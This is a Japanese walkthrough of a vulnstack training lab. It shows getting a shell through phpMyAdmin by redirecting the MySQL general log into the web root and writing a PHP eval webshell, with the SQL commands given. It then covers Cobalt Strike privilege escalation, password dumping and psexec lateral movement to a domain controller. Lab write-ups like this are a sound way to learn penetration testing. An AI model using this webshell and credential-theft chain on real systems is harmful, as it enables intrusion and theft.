概要#
靶場は:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
シンプルな靶場で、もともとは学生の評価に使われる予定でしたが、実際には使用されず、横方向のドメイン侵入も Cobalt Strike の psexec モジュールを使用しただけで、主な内容は侵入のプロセスに慣れることです。
靶場には多くの脆弱性が再現できないものもあり、環境にいくつかの問題がありますが、全体のプロセスには問題ありません。
環境構築#
3D グラフィックスの加速を無効にする必要があります。さもなければ、仮想マシンを起動できません。
トポロジー図は以下の通りです:
ネットワーク設定は以下の通りで、VMnet2 と VMnet8 を使用します:
Web サーバー(VM1) - Win7(デュアル NIC、NAT モード + vmnet2(ホスト専用))
IP:192.168.111.128 と 192.168.52.143
phpstudy を起動します。
DNS は DC を指します。
Win2008 DC(VM3)
IP:192.168.52.138
Win03 ドメインメンバー(VM2)
IP:192.168.52.141
現在のドメインを確認します。
侵入プロセス#
情報収集#
nmap ポートスキャン#
御剣スキャン#
ディレクトリスキャン#
phpinfo ページ
phpmyadmin ログイン#
パスワード:root/root
phpmyadmin getshell#
ログを通じて getshell
ログが記録されているか、ログの保存場所を確認します:SHOW VARIABLES LIKE "general_log%";
ログを有効にします:set global general_log='on';
有効になっているか確認します:SHOW VARIABLES LIKE "general_log%"
書き込むログファイルを悪意のあるファイルに設定する必要があります。まず、ウェブサイトのディレクトリを見つける必要があります。
ログパスを設定します:set global general_log_file ='C:\\phpStudy\\WWW\\s.php';
設定成功
準備が整ったら、マルウェアを書き始めます。SQL 文を使ってクエリを実行するだけです。
select "<?php @eval($_POST[cmd]);?>";
Webshell にアクセス:
http://192.168.111.128/ss.php
AntSword 接続:
ウェブサイトの 80 番ポートは yxcms です。
バックエンドにログインし、同様に SQL 文を実行できます。
Webshell で IP アドレスを確認します。
デュアル NIC を発見しました。
cs 起動#
Cobalt Strike に接続して操作します。
サーバー
クライアント
リスナーを設定します。
ペイロードを生成します。
ペイロードを AntSword にアップロードして実行します。
exe を実行し、cs に接続します。
スリープ 0
シェル whoami
権限昇格#
cs 上で getsystem を使用して一括昇格し、system 権限を取得します。
内部ネットワーク情報収集#
ターゲットをクリックすると、3 台のマシンが見つかります。開いていない場合は、ポートスキャンを行うと表示されます。
dumphash
平文パスワードを取得します。
横方向移動#
パスワードを取得した後、psexec を使用して横方向に移動します。ここでは、3 台のマシンのパスワードがすべて同じであるため、異なる場合は smb を通じて横方向に移動できません。
psexec64 を選択し、64 ビットを使用します。
ドメインコントロールサーバーを取得します。
同様の方法で 141、Win2003 のドメインメンバー機を制御します。
psexec を選択する必要があります。32 ビットを使用します。
IP を確認します。